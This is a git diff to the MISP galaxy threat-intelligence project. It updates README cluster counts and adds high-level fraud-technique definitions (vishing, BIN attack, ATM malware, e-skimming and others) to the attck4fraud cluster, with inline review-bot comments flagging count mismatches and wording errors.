diff --git a/README.md b/README.md
index c26d664..64bcb7c 100644
--- a/README.md
+++ b/README.md
@@ -47,7 +47,7 @@ Category: *atrm* - source: *https://github.com/microsoft/Azure-Threat-Research-M
[attck4fraud](https://www.misp-project.org/galaxy.html#_attck4fraud) - attck4fraud - Principles of MITRE ATT&CK in the fraud domain
-Category: *guidelines* - source: *Open Sources* - total: *31* elements
+Category: *guidelines* - source: *Open Sources* - total: *71* elements
[[HTML](https://www.misp-project.org/galaxy.html#_attck4fraud)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/attck4fraud.json)]
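Review bot: the attck4fraud total goes from 31 to 71 here, but the clusters/attck4fraud.json hunk in this same patch appends 39 new entries (from `CNP – Card Not Present` through `Implementation not according to Standards`), which gives 70 if the previous count of 31 was accurate. Please regenerate this line with the README tooling against the cluster file that ships with the change rather than editing the number by hand, so the two stay in step.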
@@ -55,7 +55,7 @@ Category: *guidelines* - source: *Open Sources* - total: *31* elements
[Backdoor](https://www.misp-project.org/galaxy.html#_backdoor) - A list of backdoor malware.
-Category: *tool* - source: *Open Sources* - total: *14* elements
+Category: *tool* - source: *Open Sources* - total: *16* elements
[[HTML](https://www.misp-project.org/galaxy.html#_backdoor)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/backdoor.json)]
@@ -159,7 +159,7 @@ Category: *first-dns* - source: *https://www.first.org/global/sigs/dns/* - total
[Malpedia](https://www.misp-project.org/galaxy.html#_malpedia) - Malware galaxy cluster based on Malpedia.
-Category: *tool* - source: *Malpedia* - total: *2574* elements
+Category: *tool* - source: *Malpedia* - total: *2823* elements
[[HTML](https://www.misp-project.org/galaxy.html#_malpedia)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/malpedia.json)]
@@ -183,7 +183,7 @@ Category: *misinformation-pattern* - source: *https://github.com/misinfosecproje
[Attack Pattern](https://www.misp-project.org/galaxy.html#_attack_pattern) - ATT&CK tactic
-Category: *attack-pattern* - source: *https://github.com/mitre/cti* - total: *1086* elements
+Category: *attack-pattern* - source: *https://github.com/mitre/cti* - total: *1099* elements
[[HTML](https://www.misp-project.org/galaxy.html#_attack_pattern)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json)]
@@ -287,7 +287,7 @@ Category: *attack-pattern* - source: *https://collaborate.mitre.org/attackics/in
[Intrusion Set](https://www.misp-project.org/galaxy.html#_intrusion_set) - Name of ATT&CK Group
-Category: *actor* - source: *https://github.com/mitre/cti* - total: *148* elements
+Category: *actor* - source: *https://github.com/mitre/cti* - total: *151* elements
[[HTML](https://www.misp-project.org/galaxy.html#_intrusion_set)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-intrusion-set.json)]
@@ -295,7 +295,7 @@ Category: *actor* - source: *https://github.com/mitre/cti* - total: *148* elemen
[Malware](https://www.misp-project.org/galaxy.html#_malware) - Name of ATT&CK software
-Category: *tool* - source: *https://github.com/mitre/cti* - total: *633* elements
+Category: *tool* - source: *https://github.com/mitre/cti* - total: *653* elements
[[HTML](https://www.misp-project.org/galaxy.html#_malware)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-malware.json)]
@@ -359,7 +359,7 @@ Category: *actor* - source: *https://github.com/mitre/cti* - total: *7* elements
[Tool](https://www.misp-project.org/galaxy.html#_tool) - Name of ATT&CK software
-Category: *tool* - source: *https://github.com/mitre/cti* - total: *82* elements
+Category: *tool* - source: *https://github.com/mitre/cti* - total: *84* elements
[[HTML](https://www.misp-project.org/galaxy.html#_tool)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-tool.json)]
@@ -431,7 +431,7 @@ Category: *sector* - source: *CERT-EU* - total: *117* elements
[Sigma-Rules](https://www.misp-project.org/galaxy.html#_sigma-rules) - MISP galaxy cluster based on Sigma Rules.
-Category: *rules* - source: *https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma* - total: *2703* elements
+Category: *rules* - source: *https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma* - total: *2568* elements
[[HTML](https://www.misp-project.org/galaxy.html#_sigma-rules)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json)]
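Review bot: the Sigma-Rules total shrinks from 2703 to 2568 while every other cluster in this README grows. A drop of 135 elements in a rules cluster usually means upstream rules were removed or merged; please confirm this is an intentional, complete regeneration and not a partial one, and mention the removal in the commit message so that users with events tagged by the dropped entries know why those tags no longer resolve.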
@@ -495,7 +495,7 @@ Category: *tea-matrix* - source: ** - total: *7* elements
[Threat Actor](https://www.misp-project.org/galaxy.html#_threat_actor) - Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign. threat-actor-classification meta can be used to clarify the understanding of the threat-actor if also considered as operation, campaign or activity group.
-Category: *actor* - source: *MISP Project* - total: *419* elements
+Category: *actor* - source: *MISP Project* - total: *420* elements
[[HTML](https://www.misp-project.org/galaxy.html#_threat_actor)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/threat-actor.json)]
@@ -503,7 +503,7 @@ Category: *actor* - source: *MISP Project* - total: *419* elements
[Tool](https://www.misp-project.org/galaxy.html#_tool) - threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.
-Category: *tool* - source: *MISP Project* - total: *552* elements
+Category: *tool* - source: *MISP Project* - total: *557* elements
[[HTML](https://www.misp-project.org/galaxy.html#_tool)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/tool.json)]
@@ -515,6 +515,7 @@ Category: *military equipment* - source: *Popular Mechanics* - total: *36* eleme
[[HTML](https://www.misp-project.org/galaxy.html#_uavs/ucavs)] - [[JSON](https://github.com/MISP/misp-galaxy/blob/main/clusters/uavs.json)]
+
# Online documentation
A [readable PDF overview of the MISP galaxy is available](https://www.misp.software/galaxy.pdf) or [HTML](https://www.misp.software/galaxy.html) and generated from the JSON.
@@ -532,12 +533,12 @@ The MISP galaxy (JSON files) are dual-licensed under:
or
~~~~
- Copyright (c) 2015-2022 Alexandre Dulaunoy - a@foo.be
- Copyright (c) 2015-2022 CIRCL - Computer Incident Response Center Luxembourg
- Copyright (c) 2015-2022 Andras Iklody
- Copyright (c) 2015-2022 Raphael Vinot
- Copyright (c) 2015-2022 Deborah Servili
- Copyright (c) 2016-2022 Various contributors to MISP Project
+ Copyright (c) 2015-2023 Alexandre Dulaunoy - a@foo.be
+ Copyright (c) 2015-2023 CIRCL - Computer Incident Response Center Luxembourg
+ Copyright (c) 2015-2023 Andras Iklody
+ Copyright (c) 2015-2023 Raphael Vinot
+ Copyright (c) 2015-2023 Deborah Servili
+ Copyright (c) 2016-2023 Various contributors to MISP Project
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
diff --git a/clusters/attck4fraud.json b/clusters/attck4fraud.json
index 73d0209..2f826de 100644
--- a/clusters/attck4fraud.json
+++ b/clusters/attck4fraud.json
@@ -1,6 +1,7 @@
{
"authors": [
- "Francesco Bigarella"
+ "Francesco Bigarella",
+ "Christophe Vandeplas"
],
"category": "guidelines",
"description": "attck4fraud - Principles of MITRE ATT&CK in the fraud domain",
@@ -24,7 +25,8 @@
"mitigation": "Implementation of DKIM and SPF authentication to detected spoofed email senders; anti-phishing solutions.",
"refs": [
"https://blog.malwarebytes.com/cybercrime/2015/02/amazon-notice-ticket-number-phish-seeks-card-details/",
- "https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/"
+ "https://www.bleepingcomputer.com/news/security/widespread-apple-id-phishing-attack-pretends-to-be-app-store-receipts/",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
],
"victim": "end customer, enterprise"
},
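Review bot: the same page-level URL `https://www.association-secure-transactions.eu/industry-information/fraud-definitions/` is added as a ref to this entry and to every other entry touched in this patch. A reference to a whole glossary rather than to the specific definition gives a reader no way to tell which term was copied; if the page has per-definition anchors, use them, otherwise name the source term in the description. Unrelated to the change but in this hunk's context: the mitigation text reads `to detected spoofed email senders`, which should be `to detect`.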
@@ -46,7 +48,11 @@
"mitigation": "Implementation of DKIM and SPF authentication to detected spoofed email senders; flagging email coming from outside the enterprise (enterprise); anti-phishing solutions; awareness training (enterprise).",
"refs": [
"http://fortune.com/2017/04/27/facebook-google-rimasauskas/",
- "https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508"
+ "https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Spear-phishing"
],
"victim": "end customer, enterprise"
},
@@ -77,7 +83,11 @@
"https://krebsonsecurity.com/2014/11/skimmer-innovation-wiretapping-atms/",
"https://krebsonsecurity.com/2016/09/secret-service-warns-of-periscope-skimmers/",
"https://krebsonsecurity.com/2011/03/green-skimmers-skimming-green",
- "https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/"
+ "https://blog.dieboldnixdorf.com/have-you-asked-yourself-this-question-about-skimming/",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Skimming - CPP ATM"
],
"victim": "end customer, enterprise"
},
@@ -91,7 +101,11 @@
"fraud-tactics:Initiation"
],
"refs": [
- "https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf"
+ "https://medium.com/@netsentries/beware-of-atm-cash-trapping-9421e498dfcf",
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Cash Trapping"
]
},
"uuid": "1e709b6e-ff4a-4645-adec-42f9636d38f8",
@@ -122,20 +136,29 @@
"value": "ATM Shimming"
},
{
- "description": "Vishing",
+ "description": "Also known as voice phishing, is the criminal practice of using social engineering over the telephone system to gain access to private personal and financial information from the public for the purpose of financial reward. It is also employed by attackers for reconnaissance purposes to gather more detailed intelligence on a target organisation.",
"meta": {
"kill_chain": [
"fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "308fb88c-412a-4468-91ed-468d07fe4170",
"value": "Vishing"
},
{
- "description": "POS Skimming",
+ "description": "CPP analysis identifies the likely merchant, POS or ATM location from where card numbers were stolen so that banks can mitigate fraud on other compromised cards.",
"meta": {
"kill_chain": [
"fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Skimming - CPP POS"
]
},
"uuid": "c33778e5-b5cc-4d12-8e4e-a329156d988c",
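Review bot: the POS Skimming description now reads `CPP analysis identifies the likely merchant, POS or ATM location from where card numbers were stolen ...`, which describes the issuer-side analysis used to locate where skimming happened, not the skimming technique the entry names; keep a description of the attack itself and, if the CPP text is wanted, attach it to the `Skimming - CPP POS` synonym or a separate note. Also, the Vishing description opens with a dangling clause (`Also known as voice phishing, is the criminal practice ...`); make the subject explicit: `Vishing, also known as voice phishing, is the criminal practice ...`.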
@@ -152,10 +175,13 @@
"value": "Social Media Scams"
},
{
- "description": "Malware",
+ "description": "Software which is specifically designed to disrupt, damage, or gain authorised access to a computer system.",
"meta": {
"kill_chain": [
"fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "6ee0f7cd-a0ef-46c5-9d80-f0fbac2a9140",
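Review bot: the Malware description says software designed to `gain authorised access to a computer system`; that inverts the meaning and should read `unauthorised access`. Worth fixing before the version bump, since the description is the text users see whenever this cluster is attached to an event.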
@@ -172,10 +198,16 @@
"value": "Account-Checking Services"
},
{
- "description": "ATM Black Box Attack",
+ "description": "Type of Jackpotting attack. Connection of an unauthorized device which sends dispense commands directly to the ATM cash dispenser in order to “cash out” the ATM.",
"meta": {
"kill_chain": [
"fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Black Box Attack"
]
},
"uuid": "6bec22cb-9aed-426a-bffc-b0a78db6527a",
@@ -192,20 +224,29 @@
"value": "Insider Trading"
},
{
- "description": "Investment Fraud",
+ "description": "A deceptive practice in the stock or commodities markets that induces investors to make purchase or sale decisions on the basis of false information, frequently resulting in losses, in violation of securities laws.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
]
},
"uuid": "92f5f46f-c506-45de-9a7f-f1128e40d47c",
"value": "Investment Fraud"
},
{
- "description": "Romance Scam",
+ "description": "Romance scam is a confidence trick involving feigning romantic intentions towards a victim, gaining their affection, and then using that goodwill to commit fraud. Fraudulent acts may involve access to the victim's money, bank accounts, credit cards, passports, e-mail accounts, or national identification numbers; or forcing the victims to commit financial fraud on their behalf.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Romance Fraud"
]
},
"uuid": "8ac64815-52c0-4d14-a4e4-4a19b2a6057d",
@@ -232,10 +273,16 @@
"value": "Cash Recovery Scam"
},
{
- "description": "Fake Invoice Fraud",
+ "description": "Invoice fraud happens when a company or organisation is tricked into changing bank account payee details for a payment. Criminals pose as regular suppliers to the company or organisation and will make a formal request for bank account details to be changed or emit false invoices.",
"meta": {
"kill_chain": [
"fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Invoice Fraud"
]
},
"uuid": "a0f764d1-b541-4ee7-bb30-21b9a735f644",
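Review bot: `emit false invoices` in the Fake Invoice Fraud description should be `issue false invoices`, and `Criminals pose as regular suppliers ... and will make a formal request` mixes tenses with the first sentence; `and make a formal request` reads better.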
@@ -272,20 +319,32 @@
"value": "CxO Fraud"
},
{
- "description": "Compromised Payment Cards",
+ "description": "The loss of or theft of a card, which is subsequently used for illegal purposes until blocked by the card issuer.",
"meta": {
"kill_chain": [
"fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Lost/Stolen Card"
]
},
"uuid": "d46e397f-8957-41f1-8736-13400b9e82fc",
"value": "Compromised Payment Cards"
},
{
- "description": "Compromised Account Credentials",
+ "description": "Account takeover fraud is a form of identity theft in which the fraudster gets access to a victim's bank or credit card accounts -- through a data breach, malware or phishing -- and uses them to make unauthorised transaction.",
"meta": {
"kill_chain": [
"fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ],
+ "synonyms": [
+ "Account Takeover Fraud"
]
},
"uuid": "7d71e71c-502f-412a-8fc7-584de8a9d203",
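Review bot: the new description for `Compromised Payment Cards` narrows the entry to `The loss of or theft of a card`, and the added synonym `Lost/Stolen Card` is only one way a card becomes compromised; the entry's name, and the skimming, e-Skimming and Data Breach entries elsewhere in this cluster, cover cards compromised by data theft while the physical card never leaves the holder. Suggest a description that covers both, for example `A payment card, or its data, that has been lost, stolen or otherwise obtained by a fraudster and is used for unauthorised transactions until blocked by the issuer`, keeping `Lost/Stolen Card` as a synonym. In `Compromised Account Credentials`, `make unauthorised transaction` should be plural: `unauthorised transactions`.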
@@ -391,7 +450,514 @@
},
"uuid": "9bfd2f4f-39a7-43fe-b5cd-a345a065276d",
"value": "ATM Explosive Attack"
+ },
+ {
+ "description": "A card not present transaction (CNP, MO/TO, Mail Order / Telephone Order, MOTOEC) is a payment card transaction made where the cardholder does not or cannot physically present the card for a merchant's visual examination at the time that an order is given and payment effected",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "a13829f4-be4b-5ada-8be4-3515b080cf6c",
+ "value": "CNP – Card Not Present"
+ },
+ {
+ "description": "A card present transaction occurs when a cardholder physically presents a card to request and authorise a financial transaction",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "422f283a-19e0-56da-b348-98b5d31fcea6",
+ "value": "CP – Card Present"
+ },
+ {
+ "description": "Fraud that occurs when a merchant account is used without the intention of operating a legitimate business transaction.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "ccd0dcc5-5f86-52fb-8e72-7aa6e8f55f8a",
+ "value": "Merchant Fraud"
+ },
+ {
+ "description": "Fraud that involves virtual currency, or virtual money, which is a type of unregulated, digital money, issued and usually controlled by its developers and used and accepted among the members of a specific virtual community.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "69273dd2-cc8d-5a83-9544-1b6f6a8f8a53",
+ "value": "Virtual Currency Fraud"
+ },
+ {
+ "description": "A category of criminal acts that involve making the unlawful use of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or account-holder's legal ownership. Most methods involve taking advantage the time between the negotiation of the cheque and its clearance at the cheque writer's financial institution to draw out these funds.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b70d490e-7eef-5219-ab93-4ea085bf9361",
+ "value": "Cheque Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via omni- channel means to digital banking or payments channels such as home banking or other electronic services.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "39de6438-4c1f-5bdc-b9a8-5cc3e889eaaf",
+ "value": "Digital Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via mobile devices to digital banking, payments channels such as home banking or other electronic services, or online merchants",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "147b0d04-933c-5244-8c67-33914426d47b",
+ "value": "Mobile Fraud"
+ },
+ {
+ "description": "Fraud perpetrated via land line telephone means to banking or payments channels such as home banking or other electronic services or merchants",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "5e28b366-d9f0-5079-b796-3fa424ec365a",
+ "value": "Telephone Fraud"
+ },
+ {
+ "description": "Fraud occurs when a standing order is falsely created or adulterated. A standing order is an automated method of making payments, where a person or business instructs their bank to pay another person or business, a fixed amount of money at regular intervals. Fraud occurs when a standing order is falsely created or adulterated.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "86e2f55d-cf76-5be8-9cf3-7bfa24d0ea2a",
+ "value": "Standing Order Fraud"
+ },
+ {
+ "description": "A scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential information",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "55a413e3-5eba-5eac-a36b-575bdb2e7cd7",
+ "value": "CEO/BEC Fraud"
+ },
+ {
+ "description": "An illegal process of concealing the origins of money obtained illegally by passing it through a complex sequence of banking transfers or commercial transactions. The overall scheme of this process returns the money to the launderer in an obscure and indirect way.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Monetisation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "d0492296-9ba7-59ad-a510-f8a0526c114a",
+ "value": "Money laundering"
+ },
+ {
+ "description": "Credit cards are produced in BIN ranges. Where an issuer does not use random generation of the card number, it is possible for an attacker to obtain one good card number and generate valid card numbers",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "37ff3b85-80f5-5380-8ce0-defee3ba819f",
+ "value": "BIN Attack"
+ },
+ {
+ "description": "In computing, a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7ca098c2-9f6e-56be-8b32-7f36833803ee",
+ "value": "DoS - Denial of Service Attack"
+ },
+ {
+ "description": "In cryptography and computer security, a man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "bcd23dee-c9da-548d-9d74-2ed7d71133be",
+ "value": "MITM - Man-in-the-Middle Attack"
+ },
+ {
+ "description": "Unauthorized physical manipulation of ATM cash withdrawal. Appears that cash has not been dispensed – a reversal message generated – SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "2ac0d577-7de1-5cbd-bf8a-30b79cd7f6cc",
+ "value": "Transaction Reversal Fraud"
+ },
+ {
+ "description": "The data contained in an authorisation message is manipulated to try to fool the payment processor.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Target Compromise"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "fb5b4715-5e6b-5134-a99a-b154b8f2cb84",
+ "value": "Transaction Message Adulteration"
+ },
+ {
+ "description": "Fraud committed against a financial institution by one of its own customers",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "09ac2614-d332-51b4-b7b0-ce3f9a74539b",
+ "value": "First Party (Friendly) Fraud"
+ },
+ {
+ "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Obtain Fraudulent Assets"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b105c344-448c-5d70-bb64-31f0f1246389",
+ "value": "Identity Spoofing (or entity hacking)"
+ },
+ {
+ "description": "A form of fraud in which victims are manipulated into making real-time payments to fraudsters, typically by social engineering attacks involving impersonation.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "b36f88c8-3682-5cac-b89d-33f64f91fc94",
+ "value": "Authorised Push Payment Fraud"
+ },
+ {
+ "description": "Direct debit fraud can take place in several ways. It is often associated with identity theft, where the scammer gains access to the bank account information by posing as the victim. They can pay for services and products via a direct debit option and use this account until its owner notices.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Assets Transfer"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "def44822-3b24-5612-b6a2-da77f84fb5d9",
+ "value": "Direct Debit Fraud"
+ },
+ {
+ "description": "Obtaining benefit through coercion",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Perform Fraud"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "e376947a-2e73-5c81-b8d5-7ac8a3ecc7a1",
+ "value": "Extortion"
+ },
+ {
+ "description": "Also known as \"SMS Phishing\", is a form of criminal activity using social engineering techniques. SMS phishing uses cell phone text messages to deliver information and/or requests to induce people to divulge or to take action that will compromise their personal or confidential information.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7607cd1c-c237-55c8-8dc6-d552ca28b86f",
+ "value": "Smishing"
+ },
+ {
+ "description": "Technique used to obtain information such as personal identification numbers (PINs), passwords and other confidential data by looking over the victim's shoulder",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7304230c-a2ba-5f85-915b-21ef2df62c0a",
+ "value": "Shoulder Surfing"
+ },
+ {
+ "description": "The process of diverting the attention of an individual or group from a desired area of focus and thereby blocking or diminishing the reception of desired information.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "cd4a2731-b691-5c91-a608-cf6c431be0ba",
+ "value": "Distraction"
+ },
+ {
+ "description": "Authorised push payment fraud happens when fraudsters deceive consumers or individuals at a business to send them a payment under false pretences to a bank account controlled by the fraudster. As payments made using real-time payment schemes are irrevocable, the victims cannot reverse a payment once they realise they have been conned.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "056a1cf1-0c75-59cc-9d73-f3b5b70ab77e",
+ "value": "Push Payments"
+ },
+ {
+ "description": "Unauthorised software, or authorises software run in an unauthorized manner on ATM PC - SEE FULL TERMINAL FRAUD DEFINITION",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "956593f4-ff08-523f-995a-6b8c56c101be",
+ "value": "ATM Malware"
+ },
+ {
+ "description": "A data breach is a security incident in which sensitive, protected or confidential data is copied, transmitted, viewed, stolen or used from a PC or Computer Network by an entity unauthorised to do so.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "65c6719e-9daf-578a-8d86-0f65b3054e75",
+ "value": "Data Breach"
+ },
+ {
+ "description": "A type of malicious software designed to block access to a computer system until a sum of money is paid",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "73e1bbdc-1b73-5b84-9f6c-6d13c491bb47",
+ "value": "Ransomware"
+ },
+ {
+ "description": "A website that is not a legitimate venue, the site is designed to entice the visitor into revealing sensitive information, to download some form of malware or to purchase products that never arrive",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "d86ff26f-b9c3-5668-8eef-7a178b6fe158",
+ "value": "Fake Website"
+ },
+ {
+ "description": "Apps in mobile devices that trick users into downloading them. They may also pose as quirky and attractive apps, providing interesting services. Once installed on a mobile device, fake apps can perform a variety of malicious routines.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "8dba8e97-7af4-5e76-8dde-3be54c9e8a6c",
+ "value": "Fake App"
+ },
+ {
+ "description": "Cyber criminals introduce skimming code on e-commerce payment card processing web pages to capture credit card and personally identifiable information and send the stolen data to a domain under their control.",
+ "meta": {
+ "kill_chain": [
+ "fraud-tactics:Initiation"
+ ],
+ "refs": [
+ "https://www.association-secure-transactions.eu/industry-information/fraud-definitions/"
+ ]
+ },
+ "uuid": "7f5886b8-06a2-51cc-8428-5cb67615e3b2",
+ "value": "e-Skimming"
+ },
+ {
